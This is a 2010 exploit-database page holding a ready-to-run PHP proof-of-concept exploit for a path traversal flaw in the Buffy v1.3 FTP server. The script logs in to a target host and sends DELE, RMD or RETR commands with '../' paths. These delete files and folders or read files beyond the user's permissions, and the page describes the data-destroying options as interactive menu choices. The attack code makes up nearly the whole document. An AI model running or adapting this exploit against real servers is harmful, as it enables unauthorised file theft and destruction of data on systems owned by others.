[remote exploits] - Buffy v1.3 Remote Directory Traversal Ex

Posted on 31 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Buffy v1.3 Remote Directory Traversal Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Buffy v1.3 Remote Directory Traversal Exploit by Pr0T3cT10n in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================
Buffy v1.3 Remote Directory Traversal Exploit
=============================================

&lt;?php
#     _             ____  __            __    ___
#    (_)____ _   __/ __ / /_____  ____/ /  _/_/ |
#   / // __  | / / / / / //_/ _ / __  /  / / / /
#  / // / / / |/ / /_/ / ,&lt; /  __/ /_/ /  / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/ 
#                   Live by the byte     |_/_/ 
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following is a proof of concept for a path traversal vulnerability that exists in Buffy FTP Server.
# The vulnerability allows an unprivileged attacker to read files and delete files &amp; folders whom he has no permissions to.
# The vulnerable FTP commands are:
# * RETR    - Read File
# * RMD     - Remove Directory
# * DELE    - Delete File
#-----------------------------------
# Exploit Title: Buffy v1.3 Remote Directory Traversal Exploit
# Date: 31/10/2010
# Author: Pr0T3cT10n
# Software Link: http://www.smotricz.com/opensource/buffy/Buffy.zip
# Affected Version: 1.3
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
 
error_reporting(E_ALL);
if(count($argv) &lt;= 4) {
    echo(&quot;
# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]
&quot;);
    echo(&quot;	HOST - An host using Buffy FTP Server
&quot;);
    echo(&quot;	PORT - Default is 21
&quot;);
    echo(&quot;	USER - Username
&quot;);
    echo(&quot;	PASS - Password
&quot;);
    exit(&quot;
&quot;);
} else {
    $CMD = &#039;&#039;;
    $CFG = Array(&#039;file&#039; =&gt; $argv[0], &#039;host&#039; =&gt; $argv[1], &#039;port&#039; =&gt; $argv[2], &#039;user&#039; =&gt; $argv[3], &#039;pass&#039; =&gt; $argv[4]);
    $sock = fsockopen($CFG[&#039;host&#039;], $CFG[&#039;port&#039;], $errno, $errstr, 5);
    if($sock) {
        echo(&quot;(+) Connected to the FTP server at &#039;{$CFG[&#039;host&#039;]}&#039; on port {$CFG[&#039;port&#039;]}
&quot;);
        $read = fread($sock, 1024);
        fwrite($sock, &quot;USER {$CFG[&#039;user&#039;]}
&quot;);
        $read = fread($sock, 1024);
        fwrite($sock, &quot;PASS {$CFG[&#039;pass&#039;]}
&quot;);
        $read = fread($sock, 1024);
        echo(&quot;(~) What would you like to do?
	1.Remove File
	2.Remove Directory
	3.Read File
&quot;);
        $CHSE = rtrim(fgets(STDIN));
        if($CHSE == 1) {
            $CMD.= &quot;DELE&quot;;
            echo(&quot;(~) Path to file(for example: ../../../test.txt): &quot;);
            $PATH = rtrim(fgets(STDIN));
            if($PATH != &#039;&#039;) {
                fwrite($sock, &quot;{$CMD} {$PATH}
&quot;);
                echo(fread($sock, 1024));
            } else {
                exit(&quot;(-) Empty path.
&quot;);
            }
        } elseif($CHSE == 2) {
            $CMD.= &quot;RMD&quot;;
            echo(&quot;(~) Path to directory(for example: ../../../test): &quot;);
            $PATH = rtrim(fgets(STDIN));
            if($PATH != &#039;&#039;) {
                fwrite($sock, &quot;{$CMD} {$PATH}
&quot;);
                echo(fread($sock, 1024));
            } else {
                exit(&quot;(-) Empty path.
&quot;);
            }
        } elseif($CHSE == 3) {
            $CMD.= &quot;RETR&quot;;
            echo(&quot;(~) Path to file(for example: ../../../test.txt): &quot;);
            $PATH = rtrim(fgets(STDIN));
            if($PATH != &#039;&#039;) {
                fwrite($sock, &quot;PASV
&quot;);
                $read = fread($sock, 1024);
                $xpld = explode(&#039;,&#039;, $read);
                $addr_tmp = explode(&#039;(&#039;, $xpld[0]);
                $address = &quot;{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}&quot;;
                $port_tmp = explode(&#039;)&#039;, $xpld[5]);
                $newport = ($xpld[4]*256)+$port_tmp[0];
                fwrite($sock, &quot;{$CMD} {$PATH}
&quot;);
                $read = fread($sock, 1024);
                $socket = fsockopen($address, $newport, $errno, $errstr, 5);
                if($socket) {
                    echo(fread($socket, 1024));
                }
            } else {
                exit(&quot;(-) Empty path.
&quot;);
            }
        } else {
            exit(&quot;(-) You have to choose correctly.
&quot;);
        }
    } else {
        exit(&quot;(-) Unable to connect to {$CFG[&#039;host&#039;]}:{$CFG[&#039;port&#039;]}
&quot;);
    }
}
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-31]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20